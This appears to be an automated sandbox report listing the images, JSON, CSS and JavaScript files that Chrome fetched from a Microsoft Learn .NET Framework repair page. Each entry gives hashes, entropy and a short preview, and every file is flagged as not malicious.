                                                                                                                                                                                  Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H*......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....|../5_.......T...~.y.'.'.|...W..[...C.)......|.[.[WK...w...w..y.{..|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z*............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):18367
                                                                                                                                                                                  Entropy (8bit):7.7772261735974215
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
                                                                                                                                                                                  MD5:240C4CC15D9FD65405BB642AB81BE615
                                                                                                                                                                                  SHA1:5A66783FE5DD932082F40811AE0769526874BFD3
                                                                                                                                                                                  SHA-256:030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
                                                                                                                                                                                  SHA-512:267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-no-resolution.png
                                                                                                                                                                                  Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! *....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/*..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?|..H+*Dd.....Y%*....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1154
                                                                                                                                                                                  Entropy (8bit):4.59126408969148
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
                                                                                                                                                                                  MD5:37258A983459AE1C2E4F1E551665F388
                                                                                                                                                                                  SHA1:603A4E9115E613CC827206CF792C62AEB606C941
                                                                                                                                                                                  SHA-256:8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
                                                                                                                                                                                  SHA-512:184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):3130
                                                                                                                                                                                  Entropy (8bit):4.790069981348324
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
                                                                                                                                                                                  MD5:EBA6E81304F2F555E1D2EA3126A18A41
                                                                                                                                                                                  SHA1:61429C3FE837FD4DD68E7B26678F131F2E00070D
                                                                                                                                                                                  SHA-256:F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
                                                                                                                                                                                  SHA-512:3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):15427
                                                                                                                                                                                  Entropy (8bit):7.784472070227724
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
                                                                                                                                                                                  MD5:3062488F9D119C0D79448BE06ED140D8
                                                                                                                                                                                  SHA1:8A148951C894FC9E968D3E46589A2E978267650E
                                                                                                                                                                                  SHA-256:C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
                                                                                                                                                                                  SHA-512:00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0*-....|...X..s...Z.Y{....w..5.._s..x...E.......... ......*............... ......*............{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`..*....4..G.|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):464328
                                                                                                                                                                                  Entropy (8bit):5.074669864961383
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:6144:XegPryKCerH5dyUJ6Yh6BFPDxZYX04GK7M4:gKCerXyUh
                                                                                                                                                                                  MD5:CB0701D474D57F8C8E2F569161CE0349
                                                                                                                                                                                  SHA1:4BE2E0C148DED16354E7A91FE721644897C5503C
                                                                                                                                                                                  SHA-256:AD52B36EA7D484522BA3382718BD370E6804F7B46AD3BE821D94AF81D66F40EB
                                                                                                                                                                                  SHA-512:BB54B08F64F85498D6592C614F844842CD87BA5A9127B1D2B8AFAEC8086DE171642EA2D241708C9D06DEFDDFA04A4189AAD4814AFD15303C6481F23793CD2D3F
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://learn.microsoft.com/static/assets/0.4.028726178/styles/site-ltr.css
                                                                                                                                                                                  Preview:.CodeMirror{height:300px;color:#000;direction:ltr;font-family:monospace}.CodeMirror-lines{padding:4px 0}.CodeMirror pre.CodeMirror-line,.CodeMirror pre.CodeMirror-line-like{padding:0 4px}.CodeMirror-scrollbar-filler,.CodeMirror-gutter-filler{background-color:#fff}.CodeMirror-gutters{white-space:nowrap;background-color:#f7f7f7;border-right:1px solid #ddd}.CodeMirror-linenumber{min-width:20px;text-align:right;color:#999;white-space:nowrap;padding:0 3px 0 5px}.CodeMirror-guttermarker{color:#000}.CodeMirror-guttermarker-subtle{color:#999}.CodeMirror-cursor{width:0;border-left:1px solid #000;border-right:none}.CodeMirror div.CodeMirror-secondarycursor{border-left:1px solid silver}.cm-fat-cursor .CodeMirror-cursor{width:auto;background:#7e7;border:0!important}.cm-fat-cursor div.CodeMirror-cursors{z-index:1}.cm-fat-cursor .CodeMirror-line::selection,.cm-fat-cursor .CodeMirror-line>span::selection,.cm-fat-cursor .CodeMirror-line>span>span::selection{background:0 0}.cm-fat-cursor{caret-color:#0
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (65410)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):207935
                                                                                                                                                                                  Entropy (8bit):5.420780972514107
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3072:Wx2fZBMb0y0Xi13tL9+pjXDMe/m7GG3/lHNVliMTqwK:Wof3G0NSkNzMeO7z/l3lhTa
                                                                                                                                                                                  MD5:3DE400B2682E30C3F33FA4B93116491F
                                                                                                                                                                                  SHA1:BC48B898DF43BA2178DE28F5A29D977B2204F846
                                                                                                                                                                                  SHA-256:84E9EAD32EFA16BE0D5B2407F799FC3DAE497BCB4A90758C0106C8D8F55003FE
                                                                                                                                                                                  SHA-512:D4004E4A62A81116D346B7A7F95FC67F97A258E82B3BDDBF4A9F28CEBB633E4A336A17057A765DA306AD9B1E40A99FE349D698B095A6F386B9CDF4A46457FC06
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:/*!. * 1DS JSLL SKU, 4.3.3. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&define.amd)define(["exports"],t);else{var r,i,e=typeof globalThis!=n?globalThis:e||self,a={},o="__ms$mod__",c={},u=c.es5_ms_jsll_4_3_3={},s="4.3.3",l="oneDS4",f=(f=e)[l]=f[l]||{},d=(d=e)[l="oneDS"]=d[l]||{},e=f[o]=f[o]||{},p=e.v=e.v||[],l=d[o]=d[o]||{},g=l.v=l.v||[];for(i in(l.o=l.o||[]).push(c),t(a),a)r="x",f[i]=a[i],p[i]=s,typeof d[i]==n?(r="n",(d[i]=a[i])&&(g[i]=s)):g[i]||(g[i]="---"),(u[r]=u[r]||[]).push(i)}}(this,function(f){"use strict";var d="function",p="object",se="undefined",ie="prototype",g=Object,h=g[ie];function y(e,t){return e||t}var C,Ce=undefined,m=null,b="",T="function",I="object",E="prototype",_="__proto__",S="undefined",x="constructor",N="Symbol",D="_polyfill",A="length",w="name",be="call",k="toString",P=y(Object),O=P[E]
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):25441
                                                                                                                                                                                  Entropy (8bit):5.152769469811509
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:63jAjCjKjvjXLQjt6j+F/XwHv1gWj/rlOVqnACpK3o3hhl0OU2/8BlsRw/6szFrX:PIFIv11pOVqlh382/rIN1v
                                                                                                                                                                                  MD5:CCDED74C889AFA3851036BDF0CADB421
                                                                                                                                                                                  SHA1:E7263595381709693C603531E5F125F10C01641C
                                                                                                                                                                                  SHA-256:E8577F9831DBFDABD050EB0B30AB35060C7CA337DB0911F7F42C09E6E265AA9D
                                                                                                                                                                                  SHA-512:3270A6A71CBCA125DADBF9BB3928201D233788CDA14A00DC01865574AC443CADCC2AE80C269657938DC1D9F8F1DB11AAEC48E42D31031635332D9526AF0C9930
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (65410)
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):207935
                                                                                                                                                                                  Entropy (8bit):5.420780972514107
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3072:Wx2fZBMb0y0Xi13tL9+pjXDMe/m7GG3/lHNVliMTqwK:Wof3G0NSkNzMeO7z/l3lhTa
                                                                                                                                                                                  MD5:3DE400B2682E30C3F33FA4B93116491F
                                                                                                                                                                                  SHA1:BC48B898DF43BA2178DE28F5A29D977B2204F846
                                                                                                                                                                                  SHA-256:84E9EAD32EFA16BE0D5B2407F799FC3DAE497BCB4A90758C0106C8D8F55003FE
                                                                                                                                                                                  SHA-512:D4004E4A62A81116D346B7A7F95FC67F97A258E82B3BDDBF4A9F28CEBB633E4A336A17057A765DA306AD9B1E40A99FE349D698B095A6F386B9CDF4A46457FC06
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
                                                                                                                                                                                  Preview:/*!. * 1DS JSLL SKU, 4.3.3. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&define.amd)define(["exports"],t);else{var r,i,e=typeof globalThis!=n?globalThis:e||self,a={},o="__ms$mod__",c={},u=c.es5_ms_jsll_4_3_3={},s="4.3.3",l="oneDS4",f=(f=e)[l]=f[l]||{},d=(d=e)[l="oneDS"]=d[l]||{},e=f[o]=f[o]||{},p=e.v=e.v||[],l=d[o]=d[o]||{},g=l.v=l.v||[];for(i in(l.o=l.o||[]).push(c),t(a),a)r="x",f[i]=a[i],p[i]=s,typeof d[i]==n?(r="n",(d[i]=a[i])&&(g[i]=s)):g[i]||(g[i]="---"),(u[r]=u[r]||[]).push(i)}}(this,function(f){"use strict";var d="function",p="object",se="undefined",ie="prototype",g=Object,h=g[ie];function y(e,t){return e||t}var C,Ce=undefined,m=null,b="",T="function",I="object",E="prototype",_="__proto__",S="undefined",x="constructor",N="Symbol",D="_polyfill",A="length",w="name",be="call",k="toString",P=y(Object),O=P[E]
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):25441
                                                                                                                                                                                  Entropy (8bit):5.152769469811509
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:63jAjCjKjvjXLQjt6j+F/XwHv1gWj/rlOVqnACpK3o3hhl0OU2/8BlsRw/6szFrX:PIFIv11pOVqlh382/rIN1v
                                                                                                                                                                                  MD5:CCDED74C889AFA3851036BDF0CADB421
                                                                                                                                                                                  SHA1:E7263595381709693C603531E5F125F10C01641C
                                                                                                                                                                                  SHA-256:E8577F9831DBFDABD050EB0B30AB35060C7CA337DB0911F7F42C09E6E265AA9D
                                                                                                                                                                                  SHA-512:3270A6A71CBCA125DADBF9BB3928201D233788CDA14A00DC01865574AC443CADCC2AE80C269657938DC1D9F8F1DB11AAEC48E42D31031635332D9526AF0C9930
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://learn.microsoft.com/en-us/banners/index.json
                                                                                                                                                                                  Preview:{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):72
                                                                                                                                                                                  Entropy (8bit):4.241202481433726
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                                                                                                                                                  MD5:9E576E34B18E986347909C29AE6A82C6
                                                                                                                                                                                  SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                                                                                                                                  SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                                                                                                                                  SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):15427
                                                                                                                                                                                  Entropy (8bit):7.784472070227724
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
                                                                                                                                                                                  MD5:3062488F9D119C0D79448BE06ED140D8
                                                                                                                                                                                  SHA1:8A148951C894FC9E968D3E46589A2E978267650E
                                                                                                                                                                                  SHA-256:C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
                                                                                                                                                                                  SHA-512:00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-recommended-changes.png
                                                                                                                                                                                  Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0*-....|...X..s...Z.Y{....w..5.._s..x...E.......... ......*............... ......*............{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`..*....4..G.|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (52717), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):52717
                                                                                                                                                                                  Entropy (8bit):5.462668685745912
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
                                                                                                                                                                                  MD5:413FCC759CC19821B61B6941808B29B5
                                                                                                                                                                                  SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
                                                                                                                                                                                  SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
                                                                                                                                                                                  SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):1432
                                                                                                                                                                                  Entropy (8bit):4.986131881931089
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:TGAcSRrEV4YUmjiqIWD5bfD9yRSmkYR/stZLKvVqXRRlAfr6VXBAuU:Ti4IV4YUmjiqr9bfskAmZTXGfSXqh
                                                                                                                                                                                  MD5:6B8763B76F400DC480450FD69072F215
                                                                                                                                                                                  SHA1:6932907906AFCF8EAFA22154D8478106521BC9EE
                                                                                                                                                                                  SHA-256:3FB84D357F0C9A66100570EDD62A04D0574C45E8A5209A3E6870FF22AF839DFC
                                                                                                                                                                                  SHA-512:8A07EBB806A0BA8EF54B463BD6AF37C77A10C1FA38A57128FD90FCB2C16DF71CE697D4FE65C623E5C6054C5715975831C36861D5574F59DF28836D9BC2B0BC22
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://learn.microsoft.com/static/assets/0.4.028726178/global/deprecation.js
                                                                                                                                                                                  Preview:// ES5 script for back compat with unsupported browsers..!(function () {..'use strict';..// Keep in sync with environment/browser.ts..var supportedBrowser =...typeof Blob === 'function' &&...typeof PerformanceObserver === 'function' &&...typeof Intl === 'object' &&...typeof MutationObserver === 'function' &&...typeof URLSearchParams === 'function' &&...typeof WebSocket === 'function' &&...typeof IntersectionObserver === 'function' &&...typeof queueMicrotask === 'function' &&...typeof TextEncoder === 'function' &&...typeof TextDecoder === 'function' &&...typeof customElements === 'object' &&...typeof HTMLDetailsElement === 'function' &&...typeof AbortController === 'function' &&...typeof AbortSignal === 'function' &&...'entries' in FormData.prototype &&...'toggleAttribute' in Element.prototype &&...'replaceChildren' in Element.prototype &&...// ES2019...'fromEntries' in Object &&...'flatMap' in Array.prototype &&...'trimEnd' in String.prototype &&...// ES2020...'allSettled' in Promise &
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (52717), with no line terminators
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):52717
                                                                                                                                                                                  Entropy (8bit):5.462668685745912
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
                                                                                                                                                                                  MD5:413FCC759CC19821B61B6941808B29B5
                                                                                                                                                                                  SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
                                                                                                                                                                                  SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
                                                                                                                                                                                  SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://wcpstatic.microsoft.com/mscc/lib/v2/wcp-consent.js
